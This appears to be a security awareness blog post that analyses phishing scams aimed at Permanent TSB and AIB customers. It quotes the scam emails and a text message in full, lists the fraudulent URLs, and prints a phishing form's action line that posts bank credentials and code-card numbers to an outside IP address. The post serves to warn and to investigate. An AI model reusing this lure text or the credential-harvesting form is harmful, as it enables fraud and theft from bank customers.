Permanent TSB customers are currently being targeted by a phishing scam that attempts to steal log-in information and passwords to the banking website.

If you happen to receive an email similar to the one below, do not respond or click on any links in the email.

Dear Esteem Customer

Due to multiple attempt error while trying to login in to your online Permanent TSB Online Account. We believed that someone other than you is trying to access your Account For security reasons, we have temporarily Flagged your account and your access to online banking will be restricted until this issue is solved.

Update your Permanent TSB Account now to enjoy the benefits of online banking and safer online banking experience.

Click here to proceed

Thanks for taking the time to learn about our upcoming plan for Enhance Online Security – it’s one more way that Permanent TSB online banking can makes your online banking experience better..

Irish Life & Permanent plc is a limited liability company registered in Dublin under No. 222332. The company’s registered office is: Irish Life Centre, Lower Abbey Street, Dublin 1.

Closer investigation of the email shows that the link actually points to a Brazillian website.

<a href="http://www.cspconsultoria.eng.br/logs/easyweb.php">

The email which we investigated comes from an insecure mail server run by an Australian company.

Received: from User (mail.blighcapital.com.au [59.167.233.41])

Mobile phone users have been receiving text messages that claim to be from AIB Bank

The text appears to come from sender: AIB

The message is as follows:

“Your AIB code card has been locked for security reasons due to recent fraud attempts. please visit http://www.aib-security.org to update your account”

If you receive a message like this do not visit the website as it is fraudulent and not operated by AIB Bank.

Although not confirmed, IT Security Consultant Alan O’Regan from Secured.ie reports that the fraudsters are using popular national websites like donedeal.ie to harvest Irish mobile numbers.

It has been reported that cyber criminals are creating as many as 57000 websites every week in a bid to obtain data from unsuspecting people. Many of these websites look and appear to be exactly like those websites you regularly use such as Visa, Amazon, Ebay, Paypal etc.

Phishing

The bogus websites are often made to look exactly like those of legitimate bank, auction, or shopping websites. The threat arises when users are unable to determine the authenticity of the websites when they click into them through search engines or email messages. While Search Engines and various security software companies do try to thwart the efforts of the hackers it can’t eliminate all the risks. This is why users need to be extremely vigilant when logging onto these websites.

According to Panda Labs 2/3 of these bogus websites related to banking websites.  ”Given the proliferation of this technique, we advise consumers to visit banking sites or online stores by typing in the address in the browser directly rather than using search engines or links in an email,” Corrons said.

While typing in the address of the website will mitigate some attacks it does not ensure complete safety said Alan O’Regan from Secured.IE. Some of these attacks hijack DNS requests so even though you have typed the correct website into the address bar you may still end up being diverted off to a bogus website.

Once again a spam e-mail message arrives in the inbox. On the surface it appears fairly ordinary. It’s an advertisement for a Viagra or some cheap Chinese knock off watches written in poor English trying to entice me to click onto some website. From time to time I like to investigate further as to how this messaged ended up being sent to my address.

A couple of weeks ago I received an email supposedly from Allied Irish Banks (alert@aib.ie)

Here is a copy of the email I received:

Dear AIB Online User,

We regret to inform you that access to your online account has been locked.

This happened because of too many failed log-in attempts.

To restore your online account access you can:

1. Visit your local branch and complete the Unlock My Account form (takes several days)

2. Complete the Unlock My Account form online, by downloading and completing the attached form (instant)

Quality service and the security of your account are of great importance to us.

We appreciate each opportunity to serve you.

Sincerely,

Customer Service

Attached to this email was a html document containing a form that requested my credentials and each of the one hundred 4 digit codes from my code card. At the top of the form the AIB logo was evident and also familiar buttons exactly the same that appear on the AIB website were included at the bottom as can be seen in the screenshot below.

Taking a look at the source of this form it could be seen that upon entering the details the information would not be sent to AIB but to some other address:

<form action=”http://189.8.16.6/appserv/form1.php” method=”post”

AIB Phishing Scam

Having a closer look at the IP address 189.8.16.6 it turns out that this does not belong to AIB but in fact points to a Unitelco broadband customer in Brazil. What in heavens would would he want all my AIB details for? I then emailed the abuse department of Unitelco informing them that one of their customers connections is involved in a Phishing scam.. To date I have not received a response.

Getting to the end of my investigation, or so I thought I then decided to have a look at the headers of the email and see exactly where that came from.
Received: from toroonXXxXxxX3.sdsl.bell.ca (HELO XXXX.net) ([69.XX.203.XX])
It turned out that this IP address belonged to a Marketing company in Canada.

An nmap of the IP revealed the following:

I promptly contacted the company to let them know that not only are they running an open mail relay on exchange (allowing anyone on the Internet to send e-mail through their server) but also appeared to have a default install of Windows 2003 Server(not a very good idea). To date this appears still not to have been remedied.

So it turned out that the spam email was sent through a poorly secured server in Canada and in the event of it finding someone susceptible enough to actually fill in the details this information would be sent to a computer in Brazil. Luckily I didn’t fall for this one and my account balance has remained in tact…. for now.